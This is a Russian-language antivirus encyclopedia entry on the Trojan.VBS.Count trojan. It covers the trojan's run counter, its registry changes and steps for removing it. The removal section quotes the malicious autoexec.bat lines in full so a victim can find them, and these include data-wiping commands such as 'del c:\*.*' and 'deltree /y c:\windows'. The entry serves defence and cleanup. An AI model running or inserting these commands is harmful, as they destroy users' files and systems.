Trojan.VBS.Count

Материал из Total Malware Info

Перейти к: навигация, поиск

Trojan.VBS.Count Троянская программа, устанавливающая в систему другие вредоносные программы, нарушающие работоспособность компьютера. Имеет размер 1 122 байта. Написан на Visual Basic Script.

Деструктивная активность

При активации троянец открывает файл count.cnt в каталоге Windows, если такой существует, в котором хранится количество запусков троянца (путь задан строго): 

c:\windows\count.cnt

Далее создает файл "c:\windows\count.cnt" и записывает в него данные о количестве запусков. Затем изменяет файл командного интерпретатора autoexec.bat: 

c:\autoexec.bat (233 байта, детектируется Антивирусом Касперского, как Trojan.BAT.DelSys.s)

Если троянец был запущен более десяти раз, то он изменяет значении параметра реестра:

  • Изменяет путь к файлу рисунка, который появляется перед входом в систему:
    • [HKCU\controlpanel\desktop\]
"wallpaper" = "c:\windows\cursors\decrypt.html"

Если троянец был запущен более одного раза:

  • Изменяет настройка команд контекстного меню для всех exe-файлов.
    • [HKCR\.exe]
"content type" = "c:\windows\mspaint.exe"

Рекомендации по удалению

Если ваш компьютер не был защищен антивирусом и оказался заражен данной вредоносной программой, то для её удаления необходимо выполнить следующие действия:

  1. Удалить оригинальный файл троянца (его расположение на зараженном компьютере зависит от способа, которым программа попала на компьютер).
  2. Восстановить параметры по умолчанию в ключах реестра (как работать с реестром?):
    3. [HKCR\.exe]
"content type" = " application/x-msdownload"
  3. Удалить значение параметра реестра (как работать с реестром?):
    4. [HKCU\controlpanel\desktop\]
"wallpaper"
  4. Перезагрузить компьютер в «безопасном режиме» (в самом начале загрузки нажать и удерживать клавишу «F8», затем выбрать пункт «Safe mode in command promt only» в меню загрузки Windows). И удалить следующие строки в файле C:\Autoexec.bat:
    5. break off
@ echo off
del c:\*.*
deltree /y c:\windows
deltree /y c:\documenti
deltree /y c:\programmi
md c:\windows\fkdra
md c:\windows\fkdrd
subst a: c:\windows\fkdra
subst d: c:\windows\fkdrd
label c:21st
ctty aux
cls
Источник — «http://www.totalmalwareinfo.com/rus/Trojan.VBS.Count»
Язык
Видеокурс
Computer and Internet Security Video Tutorials
© 2011 ООО «Лаборатория дизайн и тест». Все права защищены.